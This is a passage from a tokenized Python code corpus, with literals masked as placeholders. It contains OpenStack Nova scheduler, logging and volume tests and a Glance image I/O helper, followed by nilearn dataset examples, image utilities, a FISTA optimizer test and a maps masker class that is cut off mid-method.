test_cost_fn_weights ( self ) : <EOL> self . flags ( least_cost_scheduler_cost_functions = [ <EOL> '<STR_LIT>' ] , <EOL> noop_cost_fn_weight = <NUM_LIT:2> ) <EOL> num = <NUM_LIT:1> <EOL> request_spec = { } <EOL> hosts = self . sched . filter_hosts ( num , request_spec ) <EOL> expected = [ dict ( weight = <NUM_LIT:2> , hostname = hostname ) <EOL> for hostname , caps in hosts ] <EOL> self . assertWeights ( expected , num , request_spec , hosts ) <EOL> def test_compute_fill_first_cost_fn ( self ) : <EOL> self . flags ( least_cost_scheduler_cost_functions = [ <EOL> '<STR_LIT>' ] , <EOL> compute_fill_first_cost_fn_weight = <NUM_LIT:1> ) <EOL> num = <NUM_LIT:1> <EOL> instance_type = { '<STR_LIT>' : <NUM_LIT> } <EOL> request_spec = { '<STR_LIT>' : instance_type } <EOL> svc_states = self . sched . zone_manager . service_states . iteritems ( ) <EOL> all_hosts = [ ( host , services [ "<STR_LIT>" ] ) <EOL> for host , services in svc_states <EOL> if "<STR_LIT>" in services ] <EOL> hosts = self . sched . filter_hosts ( '<STR_LIT>' , request_spec , all_hosts ) <EOL> expected = [ ] <EOL> for idx , ( hostname , services ) in enumerate ( hosts ) : <EOL> caps = copy . deepcopy ( services [ "<STR_LIT>" ] ) <EOL> weight = <NUM_LIT:0.1> + ( <NUM_LIT:0.1> * idx ) <EOL> wtd_dict = dict ( hostname = hostname , weight = weight , <EOL> capabilities = caps ) <EOL> expected . append ( wtd_dict ) <EOL> self . assertWeights ( expected , num , request_spec , hosts ) </s>
<s> import cStringIO <EOL> from nova import context <EOL> from nova import flags <EOL> from nova import log <EOL> from nova import test <EOL> FLAGS = flags . FLAGS <EOL> def _fake_context ( ) : <EOL> return context . RequestContext ( <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> class RootLoggerTestCase ( test . TestCase ) : <EOL> def setUp ( self ) : <EOL> super ( RootLoggerTestCase , self ) . setUp ( ) <EOL> self . log = log . logging . root <EOL> def test_is_nova_instance ( self ) : <EOL> self . assert_ ( isinstance ( self . log , log . NovaLogger ) ) <EOL> def test_name_is_nova ( self ) : <EOL> self . assertEqual ( "<STR_LIT>" , self . log . name ) <EOL> def test_handlers_have_nova_formatter ( self ) : <EOL> formatters = [ ] <EOL> for h in self . log . handlers : <EOL> f = h . formatter <EOL> if isinstance ( f , log . NovaFormatter ) : <EOL> formatters . append ( f ) <EOL> self . assert_ ( formatters ) <EOL> self . assertEqual ( len ( formatters ) , len ( self . log . handlers ) ) <EOL> def test_handles_context_kwarg ( self ) : <EOL> self . log . info ( "<STR_LIT:foo>" , context = _fake_context ( ) ) <EOL> self . assert_ ( True ) <EOL> def test_module_level_methods_handle_context_arg ( self ) : <EOL> log . info ( "<STR_LIT:foo>" , context = _fake_context ( ) ) <EOL> self . assert_ ( True ) <EOL> def test_module_level_audit_handles_context_arg ( self ) : <EOL> log . audit ( "<STR_LIT:foo>" , context = _fake_context ( ) ) <EOL> self . assert_ ( True ) <EOL> def test_will_be_verbose_if_verbose_flag_set ( self ) : <EOL> self . flags ( verbose = True ) <EOL> log . reset ( ) <EOL> self . assertEqual ( log . DEBUG , self . log . level ) <EOL> def test_will_not_be_verbose_if_verbose_flag_not_set ( self ) : <EOL> self . flags ( verbose = False ) <EOL> log . reset ( ) <EOL> self . assertEqual ( log . INFO , self . log . level ) <EOL> class LogHandlerTestCase ( test . TestCase ) : <EOL> def test_log_path_logdir ( self ) : <EOL> self . flags ( logdir = '<STR_LIT>' , logfile = None ) <EOL> self . assertEquals ( log . _get_log_file_path ( binary = '<STR_LIT>' ) , <EOL> '<STR_LIT>' ) <EOL> def test_log_path_logfile ( self ) : <EOL> self . flags ( logfile = '<STR_LIT>' ) <EOL> self . assertEquals ( log . _get_log_file_path ( binary = '<STR_LIT>' ) , <EOL> '<STR_LIT>' ) <EOL> def test_log_path_none ( self ) : <EOL> self . flags ( logdir = None , logfile = None ) <EOL> self . assertTrue ( log . _get_log_file_path ( binary = '<STR_LIT>' ) is None ) <EOL> def test_log_path_logfile_overrides_logdir ( self ) : <EOL> self . flags ( logdir = '<STR_LIT>' , <EOL> logfile = '<STR_LIT>' ) <EOL> self . assertEquals ( log . _get_log_file_path ( binary = '<STR_LIT>' ) , <EOL> '<STR_LIT>' ) <EOL> class NovaFormatterTestCase ( test . TestCase ) : <EOL> def setUp ( self ) : <EOL> super ( NovaFormatterTestCase , self ) . setUp ( ) <EOL> self . flags ( logging_context_format_string = "<STR_LIT>" "<STR_LIT>" , <EOL> logging_default_format_string = "<STR_LIT>" , <EOL> logging_debug_format_suffix = "<STR_LIT>" ) <EOL> self . log = log . logging . root <EOL> self . stream = cStringIO . StringIO ( ) <EOL> self . handler = log . StreamHandler ( self . stream ) <EOL> self . log . addHandler ( self . handler ) <EOL> self . level = self . log . level <EOL> self . log . setLevel ( log . DEBUG ) <EOL> def tearDown ( self ) : <EOL> self . log . setLevel ( self . level ) <EOL> self . log . removeHandler ( self . handler ) <EOL> super ( NovaFormatterTestCase , self ) . tearDown ( ) <EOL> def test_uncontextualized_log ( self ) : <EOL> self . log . info ( "<STR_LIT:foo>" ) <EOL> self . assertEqual ( "<STR_LIT>" , self . stream . getvalue ( ) ) <EOL> def test_contextualized_log ( self ) : <EOL> ctxt = _fake_context ( ) <EOL> self . log . info ( "<STR_LIT:bar>" , context = ctxt ) <EOL> expected = "<STR_LIT>" % ctxt . request_id <EOL> self . assertEqual ( expected , self . stream . getvalue ( ) ) <EOL> def test_debugging_log ( self ) : <EOL> self . log . debug ( "<STR_LIT>" ) <EOL> self . assertEqual ( "<STR_LIT>" , self . stream . getvalue ( ) ) <EOL> class NovaLoggerTestCase ( test . TestCase ) : <EOL> def setUp ( self ) : <EOL> super ( NovaLoggerTestCase , self ) . setUp ( ) <EOL> levels = FLAGS . default_log_levels <EOL> levels . append ( "<STR_LIT>" ) <EOL> self . flags ( default_log_levels = levels , <EOL> verbose = True ) <EOL> self . log = log . getLogger ( '<STR_LIT>' ) <EOL> def test_has_level_from_flags ( self ) : <EOL> self . assertEqual ( log . AUDIT , self . log . level ) <EOL> def test_child_log_has_level_of_parent_flag ( self ) : <EOL> l = log . getLogger ( '<STR_LIT>' ) <EOL> self . assertEqual ( log . AUDIT , l . level ) </s>
<s> import stubout <EOL> from nova import exception <EOL> from nova import flags <EOL> from nova import vsa <EOL> from nova import volume <EOL> from nova import db <EOL> from nova import context <EOL> from nova import test <EOL> from nova import log as logging <EOL> import nova . image . fake <EOL> FLAGS = flags . FLAGS <EOL> LOG = logging . getLogger ( '<STR_LIT>' ) <EOL> class VsaVolumesTestCase ( test . TestCase ) : <EOL> def setUp ( self ) : <EOL> super ( VsaVolumesTestCase , self ) . setUp ( ) <EOL> self . stubs = stubout . StubOutForTesting ( ) <EOL> self . vsa_api = vsa . API ( ) <EOL> self . volume_api = volume . API ( ) <EOL> self . context = context . get_admin_context ( ) <EOL> self . default_vol_type = self . vsa_api . get_vsa_volume_type ( self . context ) <EOL> def fake_show_by_name ( meh , context , name ) : <EOL> return { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT>' : { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:1> } } <EOL> self . stubs . Set ( nova . image . fake . _FakeImageService , <EOL> '<STR_LIT>' , <EOL> fake_show_by_name ) <EOL> param = { '<STR_LIT>' : '<STR_LIT>' } <EOL> vsa_ref = self . vsa_api . create ( self . context , ** param ) <EOL> self . vsa_id = vsa_ref [ '<STR_LIT:id>' ] <EOL> def tearDown ( self ) : <EOL> if self . vsa_id : <EOL> self . vsa_api . delete ( self . context , self . vsa_id ) <EOL> self . stubs . UnsetAll ( ) <EOL> super ( VsaVolumesTestCase , self ) . tearDown ( ) <EOL> def _default_volume_param ( self ) : <EOL> return { <EOL> '<STR_LIT:size>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT:description>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : self . default_vol_type , <EOL> '<STR_LIT>' : { '<STR_LIT>' : self . vsa_id } <EOL> } <EOL> def _get_all_volumes_by_vsa ( self ) : <EOL> return self . volume_api . get_all ( self . context , <EOL> search_opts = { '<STR_LIT>' : { "<STR_LIT>" : str ( self . vsa_id ) } } ) <EOL> def test_vsa_volume_create_delete ( self ) : <EOL> """<STR_LIT>""" <EOL> volume_param = self . _default_volume_param ( ) <EOL> volume_ref = self . volume_api . create ( self . context , ** volume_param ) <EOL> self . assertEqual ( volume_ref [ '<STR_LIT>' ] , <EOL> volume_param [ '<STR_LIT:name>' ] ) <EOL> self . assertEqual ( volume_ref [ '<STR_LIT>' ] , <EOL> volume_param [ '<STR_LIT:description>' ] ) <EOL> self . assertEqual ( volume_ref [ '<STR_LIT:size>' ] , <EOL> volume_param [ '<STR_LIT:size>' ] ) <EOL> self . assertEqual ( volume_ref [ '<STR_LIT:status>' ] , <EOL> '<STR_LIT>' ) <EOL> vols2 = self . _get_all_volumes_by_vsa ( ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( vols2 ) ) <EOL> volume_ref = vols2 [ <NUM_LIT:0> ] <EOL> self . assertEqual ( volume_ref [ '<STR_LIT>' ] , <EOL> volume_param [ '<STR_LIT:name>' ] ) <EOL> self . assertEqual ( volume_ref [ '<STR_LIT>' ] , <EOL> volume_param [ '<STR_LIT:description>' ] ) <EOL> self . assertEqual ( volume_ref [ '<STR_LIT:size>' ] , <EOL> volume_param [ '<STR_LIT:size>' ] ) <EOL> self . assertEqual ( volume_ref [ '<STR_LIT:status>' ] , <EOL> '<STR_LIT>' ) <EOL> self . volume_api . update ( self . context , <EOL> volume_ref [ '<STR_LIT:id>' ] , { '<STR_LIT:status>' : '<STR_LIT>' } ) <EOL> self . volume_api . delete ( self . context , volume_ref [ '<STR_LIT:id>' ] ) <EOL> vols3 = self . _get_all_volumes_by_vsa ( ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( vols2 ) ) <EOL> volume_ref = vols3 [ <NUM_LIT:0> ] <EOL> self . assertEqual ( volume_ref [ '<STR_LIT:status>' ] , <EOL> '<STR_LIT>' ) <EOL> def test_vsa_volume_delete_nonavail_volume ( self ) : <EOL> """<STR_LIT>""" <EOL> volume_param = self . _default_volume_param ( ) <EOL> volume_ref = self . volume_api . create ( self . context , ** volume_param ) <EOL> self . volume_api . update ( self . context , <EOL> volume_ref [ '<STR_LIT:id>' ] , { '<STR_LIT:status>' : '<STR_LIT>' } ) <EOL> self . assertRaises ( exception . ApiError , <EOL> self . volume_api . delete , <EOL> self . context , volume_ref [ '<STR_LIT:id>' ] ) <EOL> def test_vsa_volume_delete_vsa_with_volumes ( self ) : <EOL> """<STR_LIT>""" <EOL> vols1 = self . _get_all_volumes_by_vsa ( ) <EOL> for i in range ( <NUM_LIT:3> ) : <EOL> volume_param = self . _default_volume_param ( ) <EOL> volume_ref = self . volume_api . create ( self . context , ** volume_param ) <EOL> vols2 = self . _get_all_volumes_by_vsa ( ) <EOL> self . assertEqual ( len ( vols1 ) + <NUM_LIT:3> , len ( vols2 ) ) <EOL> self . vsa_api . delete ( self . context , self . vsa_id ) <EOL> vols3 = self . _get_all_volumes_by_vsa ( ) <EOL> self . assertEqual ( len ( vols1 ) , len ( vols3 ) ) </s>
<s> """<STR_LIT>""" <EOL> from eventlet import event <EOL> from eventlet import greenthread <EOL> from eventlet . queue import LightQueue <EOL> from glance import client <EOL> from nova import exception <EOL> from nova import log as logging <EOL> LOG = logging . getLogger ( "<STR_LIT>" ) <EOL> IO_THREAD_SLEEP_TIME = <NUM_LIT> <EOL> GLANCE_POLL_INTERVAL = <NUM_LIT:5> <EOL> class ThreadSafePipe ( LightQueue ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , maxsize , transfer_size ) : <EOL> LightQueue . __init__ ( self , maxsize ) <EOL> self . transfer_size = transfer_size <EOL> self . transferred = <NUM_LIT:0> <EOL> def read ( self , chunk_size ) : <EOL> """<STR_LIT>""" <EOL> if self . transferred < self . transfer_size : <EOL> data_item = self . get ( ) <EOL> self . transferred += len ( data_item ) <EOL> return data_item <EOL> else : <EOL> return "<STR_LIT>" <EOL> def write ( self , data ) : <EOL> """<STR_LIT>""" <EOL> self . put ( data ) <EOL> def close ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class GlanceWriteThread ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , input , glance_client , image_id , image_meta = None ) : <EOL> if not image_meta : <EOL> image_meta = { } <EOL> self . input = input <EOL> self . glance_client = glance_client <EOL> self . image_id = image_id <EOL> self . image_meta = image_meta <EOL> self . _running = False <EOL> def start ( self ) : <EOL> self . done = event . Event ( ) <EOL> def _inner ( ) : <EOL> """<STR_LIT>""" <EOL> self . glance_client . update_image ( self . image_id , <EOL> image_meta = self . image_meta , <EOL> image_data = self . input ) <EOL> self . _running = True <EOL> while self . _running : <EOL> try : <EOL> image_status = self . glance_client . get_image_meta ( self . image_id ) . get ( <EOL> "<STR_LIT:status>" ) <EOL> if image_status == "<STR_LIT>" : <EOL> self . stop ( ) <EOL> self . done . send ( True ) <EOL> elif image_status == "<STR_LIT>" : <EOL> self . stop ( ) <EOL> exc_msg = _ ( "<STR_LIT>" ) % self . image_id <EOL> LOG . exception ( exc_msg ) <EOL> self . done . send_exception ( exception . Error ( exc_msg ) ) <EOL> elif image_status in [ "<STR_LIT>" , "<STR_LIT>" ] : <EOL> greenthread . sleep ( GLANCE_POLL_INTERVAL ) <EOL> else : <EOL> self . stop ( ) <EOL> exc_msg = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) % { <EOL> "<STR_LIT>" : self . image_id , <EOL> "<STR_LIT:state>" : image_status } <EOL> LOG . exception ( exc_msg ) <EOL> self . done . send_exception ( exception . Error ( exc_msg ) ) <EOL> except Exception , exc : <EOL> self . stop ( ) <EOL> self . done . send_exception ( exc ) <EOL> greenthread . spawn ( _inner ) <EOL> return self . done <EOL> def stop ( self ) : <EOL> self . _running = False <EOL> def wait ( self ) : <EOL> return self . done . wait ( ) <EOL> def close ( self ) : <EOL> pass <EOL> class IOThread ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , input , output ) : <EOL> self . input = input <EOL> self . output = output <EOL> self . _running = False <EOL> self . got_exception = False <EOL> def start ( self ) : <EOL> self . done = event . Event ( ) <EOL> def _inner ( ) : <EOL> """<STR_LIT>""" <EOL> self . _running = True <EOL> while self . _running : <EOL> try : <EOL> data = self . input . read ( None ) <EOL> if not data : <EOL> self . stop ( ) <EOL> self . done . send ( True ) <EOL> self . output . write ( data ) <EOL> greenthread . sleep ( IO_THREAD_SLEEP_TIME ) <EOL> except Exception , exc : <EOL> self . stop ( ) <EOL> LOG . exception ( exc ) <EOL> self . done . send_exception ( exc ) <EOL> greenthread . spawn ( _inner ) <EOL> return self . done <EOL> def stop ( self ) : <EOL> self . _running = False <EOL> def wait ( self ) : <EOL> return self . done . wait ( ) </s>
<s> from nova . vsa . api import API </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> from floyd . core . command_utils import run_cl <EOL> run_cl ( sys . argv ) </s>
<s> """<STR_LIT>""" <EOL> from nilearn import datasets <EOL> netmats = datasets . fetch_megatrawls_netmats ( dimensionality = <NUM_LIT> , <EOL> timeseries = '<STR_LIT>' , <EOL> matrices = '<STR_LIT>' ) <EOL> partial_correlation = netmats . correlation_matrices <EOL> import matplotlib . pyplot as plt <EOL> from nilearn import plotting <EOL> title = "<STR_LIT>" <EOL> plt . figure ( ) <EOL> plt . imshow ( partial_correlation , interpolation = "<STR_LIT>" , cmap = plotting . cm . bwr ) <EOL> plt . colorbar ( ) <EOL> plt . title ( title ) <EOL> plt . show ( ) </s>
<s> """<STR_LIT>""" <EOL> from nilearn import datasets <EOL> dataset = datasets . fetch_adhd ( n_subjects = <NUM_LIT:2> ) <EOL> print ( '<STR_LIT>' % dataset . func [ <NUM_LIT:0> ] ) <EOL> print ( '<STR_LIT>' % dataset . func [ <NUM_LIT:1> ] ) <EOL> from nilearn import plotting , image <EOL> result_img = image . math_img ( "<STR_LIT>" , <EOL> img1 = dataset . func [ <NUM_LIT:0> ] , <EOL> img2 = dataset . func [ <NUM_LIT:1> ] ) <EOL> plotting . plot_stat_map ( result_img , <EOL> title = "<STR_LIT>" ) <EOL> plotting . show ( ) </s>
<s> """<STR_LIT>""" <EOL> import copy <EOL> import gc <EOL> import collections <EOL> import numpy as np <EOL> import nibabel <EOL> from . compat import _basestring <EOL> def _safe_get_data ( img ) : <EOL> """<STR_LIT>""" <EOL> if hasattr ( img , '<STR_LIT>' ) and img . _data_cache is None : <EOL> img = copy . deepcopy ( img ) <EOL> gc . collect ( ) <EOL> return img . get_data ( ) <EOL> def _get_data_dtype ( img ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> return img . get_data_dtype ( ) <EOL> except AttributeError : <EOL> return img . get_data ( ) . dtype <EOL> def _get_target_dtype ( dtype , target_dtype ) : <EOL> """<STR_LIT>""" <EOL> if target_dtype is None : <EOL> return None <EOL> if target_dtype == '<STR_LIT>' : <EOL> if dtype . kind == '<STR_LIT:i>' : <EOL> target_dtype = np . int32 <EOL> else : <EOL> target_dtype = np . float32 <EOL> if target_dtype == dtype : <EOL> return None <EOL> return target_dtype <EOL> def load_niimg ( niimg , dtype = None ) : <EOL> """<STR_LIT>""" <EOL> from . . image import new_img_like <EOL> if isinstance ( niimg , _basestring ) : <EOL> niimg = nibabel . load ( niimg ) <EOL> elif not isinstance ( niimg , nibabel . spatialimages . SpatialImage ) : <EOL> raise TypeError ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> + short_repr ( niimg ) ) <EOL> dtype = _get_target_dtype ( _get_data_dtype ( niimg ) , dtype ) <EOL> if dtype is not None : <EOL> niimg = new_img_like ( niimg , niimg . get_data ( ) . astype ( dtype ) , <EOL> niimg . get_affine ( ) ) <EOL> return niimg <EOL> def copy_img ( img ) : <EOL> """<STR_LIT>""" <EOL> from . . image import new_img_like <EOL> if not isinstance ( img , nibabel . spatialimages . SpatialImage ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> return new_img_like ( img , _safe_get_data ( img ) . copy ( ) , img . get_affine ( ) . copy ( ) , <EOL> copy_header = True ) <EOL> def _repr_niimgs ( niimgs ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( niimgs , _basestring ) : <EOL> return niimgs <EOL> if isinstance ( niimgs , collections . Iterable ) : <EOL> return '<STR_LIT>' % '<STR_LIT:U+002CU+0020>' . join ( _repr_niimgs ( niimg ) for niimg in niimgs ) <EOL> try : <EOL> filename = niimgs . get_filename ( ) <EOL> if filename is not None : <EOL> return "<STR_LIT>" % ( niimgs . __class__ . __name__ , <EOL> filename ) <EOL> else : <EOL> return "<STR_LIT>" % ( niimgs . __class__ . __name__ , <EOL> repr ( niimgs . shape ) , <EOL> repr ( niimgs . get_affine ( ) ) ) <EOL> except : <EOL> pass <EOL> return repr ( niimgs ) <EOL> def short_repr ( niimg ) : <EOL> """<STR_LIT>""" <EOL> this_repr = _repr_niimgs ( niimg ) <EOL> if len ( this_repr ) > <NUM_LIT:20> : <EOL> this_repr = this_repr [ : <NUM_LIT> ] + '<STR_LIT>' <EOL> return this_repr </s>
<s> from nose . tools import assert_equal , assert_true <EOL> import numpy as np <EOL> from nilearn . decoding . fista import mfista <EOL> from nilearn . decoding . proximal_operators import _prox_l1 <EOL> from nilearn . decoding . objective_functions import ( <EOL> _squared_loss , <EOL> _logistic , <EOL> _squared_loss_grad , <EOL> _logistic_loss_lipschitz_constant , <EOL> spectral_norm_squared ) <EOL> from nilearn . decoding . fista import _check_lipschitz_continuous <EOL> def test_logistic_lipschitz ( n_samples = <NUM_LIT:4> , n_features = <NUM_LIT:2> , random_state = <NUM_LIT> ) : <EOL> rng = np . random . RandomState ( random_state ) <EOL> for scaling in np . logspace ( - <NUM_LIT:3> , <NUM_LIT:3> , num = <NUM_LIT:7> ) : <EOL> X = rng . randn ( n_samples , n_features ) * scaling <EOL> y = rng . randn ( n_samples ) <EOL> n_features = X . shape [ <NUM_LIT:1> ] <EOL> L = _logistic_loss_lipschitz_constant ( X ) <EOL> _check_lipschitz_continuous ( lambda w : _logistic ( <EOL> X , y , w ) , n_features + <NUM_LIT:1> , L ) <EOL> def test_squared_loss_lipschitz ( n_samples = <NUM_LIT:4> , n_features = <NUM_LIT:2> , random_state = <NUM_LIT> ) : <EOL> rng = np . random . RandomState ( random_state ) <EOL> for scaling in np . logspace ( - <NUM_LIT:3> , <NUM_LIT:3> , num = <NUM_LIT:7> ) : <EOL> X = rng . randn ( n_samples , n_features ) * scaling <EOL> y = rng . randn ( n_samples ) <EOL> n_features = X . shape [ <NUM_LIT:1> ] <EOL> L = spectral_norm_squared ( X ) <EOL> _check_lipschitz_continuous ( lambda w : _squared_loss_grad ( <EOL> X , y , w ) , n_features , L ) <EOL> def test_input_args_and_kwargs ( ) : <EOL> rng = np . random . RandomState ( <NUM_LIT> ) <EOL> p = <NUM_LIT> <EOL> noise_std = <NUM_LIT> <EOL> sig = np . zeros ( p ) <EOL> sig [ [ <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT> , <NUM_LIT:4> , <NUM_LIT> , <NUM_LIT:32> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , - <NUM_LIT:1> ] ] = <NUM_LIT:1> <EOL> sig [ : <NUM_LIT:6> ] = <NUM_LIT:2> <EOL> sig [ - <NUM_LIT:7> : ] = <NUM_LIT:2> <EOL> sig [ <NUM_LIT> : <NUM_LIT> ] = <NUM_LIT:1> <EOL> y = sig + noise_std * rng . randn ( * sig . shape ) <EOL> X = np . eye ( p ) <EOL> mask = np . ones ( ( p , ) ) . astype ( np . bool ) <EOL> alpha = <NUM_LIT> <EOL> alpha_ = alpha * X . shape [ <NUM_LIT:0> ] <EOL> l1_ratio = <NUM_LIT> <EOL> l1_weight = alpha_ * l1_ratio <EOL> f1 = lambda w : _squared_loss ( X , y , w , compute_grad = False ) <EOL> f1_grad = lambda w : _squared_loss ( X , y , w , compute_grad = True , <EOL> compute_energy = False ) <EOL> f2_prox = lambda w , l , * args , ** kwargs : ( _prox_l1 ( w , l * l1_weight ) , <EOL> dict ( converged = True ) ) <EOL> total_energy = lambda w : f1 ( w ) + l1_weight * np . sum ( np . abs ( w ) ) <EOL> for cb_retval in [ <NUM_LIT:0> , <NUM_LIT:1> ] : <EOL> for verbose in [ <NUM_LIT:0> , <NUM_LIT:1> ] : <EOL> for dgap_factor in [ <NUM_LIT:1.> , None ] : <EOL> best_w , objective , init = mfista ( <EOL> f1_grad , f2_prox , total_energy , <NUM_LIT:1.> , p , <EOL> dgap_factor = dgap_factor , <EOL> callback = lambda _ : cb_retval , verbose = verbose , <EOL> max_iter = <NUM_LIT:100> ) <EOL> assert_equal ( best_w . shape , mask . shape ) <EOL> assert_true ( isinstance ( objective , list ) ) <EOL> assert_true ( isinstance ( init , dict ) ) <EOL> for key in [ "<STR_LIT:w>" , "<STR_LIT:t>" , "<STR_LIT>" , "<STR_LIT>" ] : <EOL> assert_true ( key in init ) </s>
<s> """<STR_LIT>""" <EOL> import numpy as np <EOL> from sklearn . externals . joblib import Memory <EOL> from . . import _utils <EOL> from . . _utils import logger , CacheMixin <EOL> from . . _utils . niimg import _get_data_dtype <EOL> from . . _utils . class_inspect import get_params <EOL> from . . _utils . niimg_conversions import _check_same_fov <EOL> from . . import image <EOL> from . base_masker import filter_and_extract , BaseMasker <EOL> class _ExtractionFunctor ( object ) : <EOL> func_name = '<STR_LIT>' <EOL> def __init__ ( self , _resampled_maps_img_ , _resampled_mask_img_ ) : <EOL> self . _resampled_maps_img_ = _resampled_maps_img_ <EOL> self . _resampled_mask_img_ = _resampled_mask_img_ <EOL> def __call__ ( self , imgs ) : <EOL> from . . regions import signal_extraction <EOL> return signal_extraction . img_to_signals_maps ( <EOL> imgs , self . _resampled_maps_img_ , <EOL> mask_img = self . _resampled_mask_img_ ) <EOL> class NiftiMapsMasker ( BaseMasker , CacheMixin ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , maps_img , mask_img = None , <EOL> allow_overlap = True , <EOL> smoothing_fwhm = None , standardize = False , detrend = False , <EOL> low_pass = None , high_pass = None , t_r = None , <EOL> resampling_target = "<STR_LIT:data>" , <EOL> memory = Memory ( cachedir = None , verbose = <NUM_LIT:0> ) , memory_level = <NUM_LIT:0> , <EOL> verbose = <NUM_LIT:0> ) : <EOL> self . maps_img = maps_img <EOL> self . mask_img = mask_img <EOL> self . allow_overlap = allow_overlap <EOL> self . smoothing_fwhm = smoothing_fwhm <EOL> self . standardize = standardize <EOL> self . detrend = detrend <EOL> self . low_pass = low_pass <EOL> self . high_pass = high_pass <EOL> self . t_r = t_r <EOL> self . resampling_target = resampling_target <EOL> self . memory = memory <EOL> self . memory_level = memory_level <EOL> self . verbose = verbose <EOL> if resampling_target not in ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:data>" , None ) : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" + str ( resampling_target ) ) <EOL> if self . mask_img is None and resampling_target == "<STR_LIT>" : <EOL> raise ValueError ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def fit ( self , X = None , y = None ) : <EOL> """<STR_LIT>""" <EOL> logger . log ( "<STR_LIT>" % <EOL> _utils . _repr_niimgs ( self . maps_img ) [ : <NUM_LIT:200> ] , <EOL> verbose = self . verbose ) <EOL> self . maps_img_ = _utils . check_niimg_4d ( self . maps_img ) <EOL> if self . mask_img is not None : <EOL> logger . log ( "<STR_LIT>" % <EOL> _utils . _repr_niimgs ( self . mask_img ) [ : <NUM_LIT:200> ] , <EOL> verbose = self . verbose ) <EOL> self . mask_img_ = _utils . check_niimg_3d ( self . mask_img ) <EOL> else : <EOL> self . mask_img_ = None <EOL> if self . resampling_target is None and self . mask_img_ is not None : <EOL> _check_same_fov ( mask = self . mask_img_ , maps = self . maps_img_ , <EOL> raise_error = True ) <EOL> elif self . resampling_target == "<STR_LIT>" and self . mask_img_ is not None : <EOL> if self . verbose > <NUM_LIT:0> : <EOL> print ( "<STR_LIT>" ) <EOL> self . maps_img_ = image . resample_img ( <EOL> self . maps_img_ , <EOL> target_affine = self . mask_img_ . get_affine ( ) , <EOL> target_shape = self . mask_img_ . shape , <EOL> interpolation = "<STR_LIT>" , <EOL> copy = True ) <EOL> elif self . resampling_target == "<STR_LIT>" and self . mask_img_ is not None : <EOL> if self . verbose > <NUM_LIT:0> : <EOL> print ( "<STR_LIT>" ) <EOL> self . mask_img_ = image . resample_img ( <EOL> self . mask_img_ , <EOL> target_affine = self . maps_img_ . get_affine ( ) , <EOL> target_shape = self . maps_img_ . shape [ : <NUM_LIT:3> ] , <EOL> interpolation = "<STR_LIT>" , <EOL> copy = True ) <EOL> return self <EOL> def _check_fitted ( self ) : <EOL> if not hasattr ( self , "<STR_LIT>" ) : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> % self . __class__ . __name__ ) <EOL> def fit_transform ( self , imgs , confounds = None ) : <EOL> """<STR_LIT>""" <EOL> return self . fit ( ) . transform ( imgs , confounds = confounds ) <EOL> def transform_single_imgs ( self , imgs , confounds = None ) : <EOL> """<STR_LIT>""" <EOL> if not hasattr ( self , '<STR_LIT>' ) : <EOL> self . _resampled_maps_img_ = self . maps_img_ <EOL> if not hasattr ( self , '<STR_LIT>' ) : <EOL> self . _resampled_mask_img_ = self . mask_img_ <EOL> if self . resampling_target is None : <EOL> imgs_ = _utils . check_niimg_4d ( imgs ) <EOL> images = dict ( maps = self . maps_img_ , data = imgs_ ) <EOL> if self . mask_img_ is not None : <EOL> images [ '<STR_LIT>' ] = self . mask_img_ <EOL> _check_same_fov ( raise_error = True , ** images ) <EOL> else : <EOL> if self . resampling_target == "<STR_LIT:data>" : <EOL> imgs_ = _utils . check_niimg_4d ( imgs ) <EOL> ref_img = imgs_ <EOL> elif self . resampling_target == "<STR_LIT>" : <EOL> self . _resampled_mask_img_ = self . mask_img_ <EOL> ref_img = self . mask_img_ <EOL> elif self . resampling_target == "<STR_LIT>" : <EOL> self . _resampled_maps_img_ = self . maps_img_ <EOL> ref_img = self . maps_img_ <EOL> if not _check_same_fov ( ref_img , self . _resampled_maps_img_ ) : <EOL> if self . verbose > <NUM_LIT:0> : <EOL> print ( "<STR_LIT>" ) <EOL> self . _resampled_maps_img_ = self . _cache ( image . resample_img ) ( <EOL> self . maps_img_ , interpolation = "<STR_LIT>" , <EOL> target_shape = ref_img . shape [ : <NUM_LIT:3> ] , <EOL> target_affine = ref_img . get_affine ( ) ) <EOL> if ( self . mask_img_ is not None and <EOL> not _check_same_fov ( ref_img , self . mask_img_ ) ) : <EOL> if self . verbose > <NUM_LIT:0> : <EOL> print ( "<STR_LIT>" ) <EOL> self . _resampled_mask_img_ = self . _cache ( image . resample_img ) ( <EOL> self . mask_img_ , interpolation = "<STR_LIT>" , <EOL> target_shape = ref_img . shape [ : <NUM_LIT:3> ] , <EOL> target_affine = ref_img . get_affine ( ) ) <EOL> if not self . allow_overlap : <EOL> dtype = _get_data_dtype ( self . _resampled_maps_img_ ) <EOL> data = self . _resampled_maps_img_ . get_data ( ) <EOL> if dtype . kind == '<STR_LIT:f>' : <EOL> data [ data < np . finfo ( dtype ) . eps ] = <NUM_LIT:0.> <EOL> if np . any ( np . sum ( data > <NUM_LIT:0.> , axis = <NUM_LIT:3> ) > <NUM_LIT:1> ) : <EOL> 